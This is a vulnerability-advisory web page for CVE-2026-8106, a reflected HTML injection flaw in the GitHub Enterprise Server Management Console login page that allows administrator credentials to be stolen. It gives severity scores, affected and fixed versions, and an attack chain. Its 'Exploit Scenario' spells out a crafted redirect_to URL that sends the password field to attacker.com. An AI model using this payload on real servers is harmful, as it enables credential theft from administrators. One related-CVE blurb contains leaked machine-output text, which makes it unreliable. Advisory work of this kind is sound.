Skip to main content

GitHub Enterprise Server EUVDEUVD-2026-28465

| CVE-2026-8106 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-07 GitHub_P GHSA-xqmx-3vx6-fm88
5.9
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.9 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

4
Analysis Generated
May 08, 2026 - 00:15 vuln.today
CVSS changed
May 07, 2026 - 22:22 NVD
5.9 (MEDIUM)
CVE Published
May 07, 2026 - 21:18 nvd
UNKNOWN (no severity yet)
CVE Published
May 07, 2026 - 21:18 nvd
MEDIUM 5.9

DescriptionGitHub Advisory

A reflected HTML injection vulnerability was identified in the GitHub Enterprise Server Management Console login page that could allow credential theft. The redirect_to query parameter on the /setup/unlock endpoint was reflected into an HTML attribute without proper sanitization, enabling an attacker to inject a form element that could capture administrator credentials. Exploitation required an administrator to click a crafted link and enter their credentials. This vulnerability affected GitHub Enterprise Server versions 3.19.1 through 3.19.5 and 3.20.0 through 3.20.1, and was fixed in versions 3.19.6 and 3.20.2. This vulnerability was reported via the GitHub Bug Bounty program.

AnalysisAI

Reflected HTML injection in GitHub Enterprise Server Management Console login page allows credential theft when administrators click crafted links. The /setup/unlock endpoint reflects the redirect_to query parameter into an HTML attribute without sanitization, enabling attackers to inject malicious form elements that capture credentials. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker crafts malicious redirect_to URL
Delivery
Sends phishing email to administrator
Exploit
Administrator clicks link
Install
Server reflects unescaped parameter into HTML attribute
C2
JavaScript injects credential-capture form
Execute
Administrator enters credentials
Impact
Attacker steals credentials

Vulnerability AssessmentAI

Exploitation Exploitation requires the following specific conditions: (1) the target must be running GitHub Enterprise Server version 3.19.1-3.19.5 or 3.20.0-3.20.1; (2) an administrator must click a crafted link containing malicious payload in the redirect_to parameter; (3) the administrator must then enter their credentials into the login form. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 5.9 (medium) with AV:N (network), AC:L (low complexity), but AT:P (passive attack timing) and UI:A (user interaction required) are critical limiting factors. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker crafts a URL such as https://github-enterprise.internal/setup/unlock?redirect_to="onload="javascript:fetch('https://attacker.com/steal?creds='%2bdocument.getElementById('password').value) and sends it to a GitHub Enterprise administrator via spear-phishing email. When the administrator clicks the link and logs in, the injected JavaScript executes, exfiltrating the credentials to the attacker's server. …
Remediation Upgrade GitHub Enterprise Server to version 3.19.6 or later if running 3.19.x, or to version 3.20.2 or later if running 3.20.x. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2026-9312 CRITICAL
9.2 May 27

Server-side request forgery in GitHub Enterprise Server lets an unauthenticated attacker coerce the appliance into issui

CVE-2026-0573 CRITICAL
9.0 Feb 18

URL redirection vulnerability in GitHub Enterprise Server allows attacker-controlled redirects through crafted URLs, pot

CVE-2026-3854 HIGH POC
8.7 Mar 10

Remote code execution in GitHub Enterprise Server allows authenticated users with repository push access to execute arbi

CVE-2025-3246 HIGH
8.6 Apr 17

An improper neutralization of input vulnerability was identified in GitHub Enterprise Server that allowed cross-site scr

CVE-2026-4821 HIGH
8.1 Apr 21

An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an

CVE-2026-8034 HIGH
7.9 May 07

Server-side request forgery in GitHub Enterprise Server's notebook viewer enables remote unauthenticated attackers to ac

CVE-2025-3509 HIGH
7.1 Apr 17

A Remote Code Execution (RCE) vulnerability was identified in GitHub Enterprise Server that allowed attackers to execute

CVE-2026-4296 HIGH
7.5 Apr 21

An incorrect regular expression vulnerability was identified in GitHub Enterprise Server that allowed an attacker to byp

CVE-2026-5845 HIGH
7.2 Apr 21

An improper authorization vulnerability in scoped user-to-server (ghu_) token authorization in GitHub Enterprise Server

CVE-2026-1999 HIGH
7.1 Feb 18

GitHub Enterprise Server allows authenticated webhook administrators to bypass network restrictions through Server-Side

CVE-2026-8606 HIGH
7.0 May 26

Here is the multi-source synthesis for CVE-2026-8606: ```json { "product_name": "GitHub Enterprise Server", "summar

CVE-2026-1355 MEDIUM
6.5 Feb 18

GitHub Enterprise Server versions before 3.20 contain an authorization bypass in the repository migration upload endpoin

Share

EUVD-2026-28465 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy